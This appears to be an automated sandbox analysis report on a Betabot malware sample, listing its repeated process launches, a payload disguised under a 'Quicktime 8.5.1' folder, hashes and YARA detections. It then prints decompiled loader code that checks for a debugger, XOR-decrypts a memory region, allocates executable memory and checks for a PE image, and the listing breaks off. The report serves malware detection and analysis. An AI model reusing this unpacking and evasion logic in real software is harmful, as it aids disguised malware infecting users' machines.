                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000006.00000002.571461105.0000000003358000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000006.00000000.316211995.0000000003358000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      General

                      Target ID:7
                      Start time:12:46:12
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000007.00000002.574221556.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000007.00000000.319722392.0000000003B60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000007.00000000.321390577.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      General

                      Target ID:8
                      Start time:12:46:14
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000008.00000000.435841188.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000008.00000000.432511210.00000000011B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000008.00000002.569348461.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      General

                      Target ID:9
                      Start time:12:46:15
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000009.00000002.572338181.0000000003518000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000009.00000000.332881474.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000009.00000000.333990965.0000000003518000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      General

                      Target ID:10
                      Start time:12:46:15
                      Start date:05/12/2022
                      Path:C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
                      Imagebase:0xcd0000
                      File size:141312 bytes
                      MD5 hash:0DE785A3D83482EE5B7E3E396A641BC7
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000A.00000002.329064108.0000000001538000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      General

                      Target ID:11
                      Start time:12:46:20
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000B.00000002.573518624.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000B.00000000.337658379.0000000003780000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000B.00000000.339819447.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      General

                      Target ID:12
                      Start time:12:46:23
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000C.00000002.573127445.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000C.00000000.343998812.0000000002B20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000C.00000000.346029099.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:13
                      Start time:12:46:23
                      Start date:05/12/2022
                      Path:C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
                      Imagebase:0xcd0000
                      File size:141312 bytes
                      MD5 hash:0DE785A3D83482EE5B7E3E396A641BC7
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000D.00000002.343659679.00000000012D8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:14
                      Start time:12:46:25
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000E.00000000.349814520.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000E.00000002.574122408.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000E.00000000.351556895.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:15
                      Start time:12:46:28
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000F.00000002.573251429.0000000003568000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000F.00000000.355904622.0000000003540000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000F.00000000.357740409.0000000003568000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:16
                      Start time:12:46:31
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000010.00000002.573558016.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000010.00000000.364565540.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000010.00000000.361667048.0000000003F70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:17
                      Start time:12:46:35
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000011.00000002.571024772.0000000001418000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000011.00000000.371629767.00000000013F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000011.00000000.373766478.0000000001418000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:18
                      Start time:12:46:39
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000012.00000000.380564947.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000012.00000000.377927046.0000000001EF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000012.00000002.573636410.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:19
                      Start time:12:46:42
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000013.00000000.384576114.00000000037F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000013.00000002.573110629.0000000003818000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000013.00000000.386887819.0000000003818000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:20
                      Start time:12:46:45
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000014.00000002.574455217.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000014.00000000.392323666.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000014.00000000.390278122.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:21
                      Start time:12:46:47
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000015.00000000.396214324.0000000001C30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000015.00000000.397968179.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000015.00000002.569168238.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:22
                      Start time:12:46:50
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000016.00000000.407634102.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000016.00000000.403064355.00000000014B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000016.00000002.570822035.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:23
                      Start time:12:46:54
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000017.00000002.567453491.0000000001648000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000017.00000000.411551366.0000000001620000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000017.00000000.413386214.0000000001648000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:28.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:32%
                        Total number of Nodes:25
                        Total number of Limit Nodes:7
                        execution_graph 310 cd120a GetPEB 311 cd121a 310->311 312 cd1250 ExitProcess 311->312 318 cd1024 GetModuleHandleW 311->318 314 cd1229 314->312 320 cd1133 314->320 316 cd1238 316->312 328 cd16e9 316->328 319 cd103e 318->319 319->314 321 cd11c7 320->321 322 cd1143 320->322 321->316 322->321 323 cd114a VirtualProtectEx 322->323 323->321 324 cd1173 VirtualAllocEx 323->324 324->321 327 cd119f 324->327 326 cd11bf VirtualFreeEx 326->321 327->321 327->326 329 cd1767 328->329 330 cd16f0 328->330 329->312 330->329 331 cd16f6 VirtualAllocEx 330->331 331->329 332 cd171b 331->332 333 cd1745 VirtualFreeEx 332->333 334 cd1756 332->334 333->329 336 cd1698 334->336 337 cd16a9 GetPEB 336->337 338 cd16c1 336->338 337->338 338->329 343 2770f5a LdrInitializeThunk

                        Callgraph

                        Executed Functions

                        Function 00CD120A Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 38 cd120a-cd1218 GetPEB 39 cd121a-cd121e 38->39 40 cd1220-cd122b call cd1024 38->40 39->40 41 cd1250-cd1252 ExitProcess 39->41 40->41 44 cd122d-cd123d call cd1133 40->44 44->41 47 cd123f-cd1246 call cd1098 44->47 47->41 50 cd1248-cd124b call cd16e9 47->50 50->41
                        C-Code - Quality: 87%
                        			_entry_() {
				signed int _v8;
				intOrPtr _t6;
				void* _t8;
				void* _t14;

				_t6 =  *[fs:0x30];
				if(_t6 == 0 ||  *((char*)(_t6 + 2)) != 1) {
					_v8 = _v8 & 0x00000000;
					if(E00CD1024() != 0) {
						_t8 = E00CD1133(_t7,  &_v8); // executed
						_t12 = _t8;
						_pop(_t14);
						if(_t8 != 0 && E00CD1098(_t12) != 0) {
							E00CD16E9(_t12, _t14, _v8); // executed
						}
					}
				}
				ExitProcess(0);
			}







                        0x00cd120e
                        0x00cd1218
                        0x00cd1220
                        0x00cd122b
                        0x00cd1233
                        0x00cd1238
                        0x00cd123a
                        0x00cd123d
                        0x00cd124b
                        0x00cd124b
                        0x00cd123d
                        0x00cd122b
                        0x00cd1252

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305081884.0000000000CD1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CD0000, based on PE: true
                        • Associated: 00000000.00000002.305067270.0000000000CD0000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.305094573.0000000000CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.305102626.0000000000CF4000.00000040.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cd0000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: c3e06d59c97abaf6c9797fcf831f39c369c84f9ae9716bb26adfaf5fb18a79dc
                        • Instruction ID: 5f8bba4b7440b4e86074b839e56e57ec53d7d8ac9f025570f35be7370099dc21
                        • Opcode Fuzzy Hash: c3e06d59c97abaf6c9797fcf831f39c369c84f9ae9716bb26adfaf5fb18a79dc
                        • Instruction Fuzzy Hash: DAF03031514245BAFB14ABE58E85B6A76EC9F01391F0C4066FF04D2356DA61DE049268
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 027728F0 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 59 27728f0-2772902 LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1305f00d4ca459a5750352b2cabac9759cf2984985f5833527dee6fd78f3aa18
                        • Instruction ID: 38463184d087a17bee18e3960e375fbe367c0bf18129373c0e5f820e61b29ba4
                        • Opcode Fuzzy Hash: 1305f00d4ca459a5750352b2cabac9759cf2984985f5833527dee6fd78f3aa18
                        • Instruction Fuzzy Hash: CBB092B168D2824BC3416320082C9A6AB142BB6310B6980AFD0C00A18ADA584931D3A7
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00CD1698 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 60 cd1698-cd16a7 61 cd16a9-cd16bf GetPEB 60->61 62 cd16e4 60->62 61->62 63 cd16c1-cd16cc 61->63 65 cd16e7-cd16e8 62->65 63->62 64 cd16ce-cd16d1 63->64 66 cd16db-cd16de 64->66 67 cd16d3-cd16d7 64->67 69 cd16e1 66->69 67->64 68 cd16d9 67->68 68->69 69->62
                        Memory Dump Source
                        • Source File: 00000000.00000002.305081884.0000000000CD1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CD0000, based on PE: true
                        • Associated: 00000000.00000002.305067270.0000000000CD0000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.305094573.0000000000CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.305102626.0000000000CF4000.00000040.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cd0000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d99057a546bda6ba5ce5ce38362ae21d8058b2126ef7702eadda58165c30613b
                        • Instruction ID: fa5d629e33415fb507229818d6247b51a0344aa6dbbde97adf3f1cb1cac36da1
                        • Opcode Fuzzy Hash: d99057a546bda6ba5ce5ce38362ae21d8058b2126ef7702eadda58165c30613b
                        • Instruction Fuzzy Hash: 76F0C470A11609EFDB14CF95C181AA9BBB4EB14719F2C819AE9059B351D374DE42DB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00CD1133 Relevance: 4.6, APIs: 3, Instructions: 86memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 cd1133-cd113d 1 cd11c7 0->1 2 cd1143-cd1148 0->2 3 cd11c9-cd11cc 1->3 2->1 4 cd114a-cd1171 VirtualProtectEx 2->4 4->1 5 cd1173-cd1177 4->5 6 cd1179-cd1182 5->6 7 cd1184-cd119d VirtualAllocEx 5->7 6->6 6->7 7->1 8 cd119f-cd11b3 call cd12eb 7->8 11 cd11cd-cd11e4 call cd1863 8->11 12 cd11b5-cd11bc 8->12 16 cd11e6-cd11f0 11->16 17 cd11f2-cd11fa 11->17 13 cd11bf-cd11c1 VirtualFreeEx 12->13 13->1 16->17 18 cd11fc-cd1201 16->18 17->13 18->3 19 cd1203-cd1208 18->19 19->3
                        C-Code - Quality: 63%
                        			E00CD1133(void* __esi, long* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				int _t26;
				void* _t27;
				void* _t28;
				void* _t30;
				signed int _t32;
				void* _t34;
				void* _t39;
				long* _t42;
				long _t45;
				void* _t46;

				_t46 = __esi;
				if(__esi == 0) {
					L9:
					return 0;
				}
				_t45 =  *(__esi + 0x18);
				if(_t45 == 0) {
					goto L9;
				}
				_v16 = _v16 & 0x00000000;
				_v8 =  *((intOrPtr*)(__esi + 0x10));
				_v12 = _t45 << 2;
				_t8 = _t46 + 0x1c; // 0x1c
				_t34 = _t8;
				_t26 = VirtualProtectEx(0xffffffff, _t34, _t45, 0x40,  &_v16); // executed
				if(_t26 == 0) {
					goto L9;
				}
				_t27 = 0;
				if(_t45 != 0) {
					do {
						 *(_t27 + _t34) =  *(_t27 + _t34) ^ _v8;
						_t27 = _t27 + 1;
					} while (_t27 < _t45);
				}
				_t28 = VirtualAllocEx(0xffffffff, 0, _v12, 0x3000, 0x40); // executed
				_v8 = _t28;
				if(_t28 == 0) {
					goto L9;
				}
				_t30 = E00CD12EB(_t34, _t45, _t28,  *((intOrPtr*)(_t46 + 0x14)) + 1);
				_pop(_t39);
				if(_t30 == 0xffffffff) {
					_push(0x8000);
					_push(0);
					_push(_v8);
					L8:
					VirtualFreeEx(0xffffffff, ??, ??, ??);
					goto L9;
				}
				E00CD1863(_t39, _t34, 0, _t45);
				_t32 = _v8;
				if( *_t32 != 0x5a4d ||  *((intOrPtr*)(_t32 +  *((intOrPtr*)(_t32 + 0x3c)))) != 0x4550) {
					_push(0x8000);
					_push(0);
					_push(_t32);
					goto L8;
				}
				_t42 = _a4;
				if(_t42 != 0) {
					 *_t42 = _v12;
					return _t32;
				}
				return _t32;
			}
















                        0x00cd1133
                        0x00cd113d
                        0x00cd11c7
                        0x00000000
                        0x00cd11c7
                        0x00cd1143
                        0x00cd1148
                        0x00000000
                        0x00000000
                        0x00cd114d
                        0x00cd1151
                        0x00cd1159
                        0x00cd1163
                        0x00cd1163
                        0x00cd1169
                        0x00cd1171
                        0x00000000
                        0x00000000
                        0x00cd1173
                        0x00cd1177
                        0x00cd1179
                        0x00cd117c
                        0x00cd117f
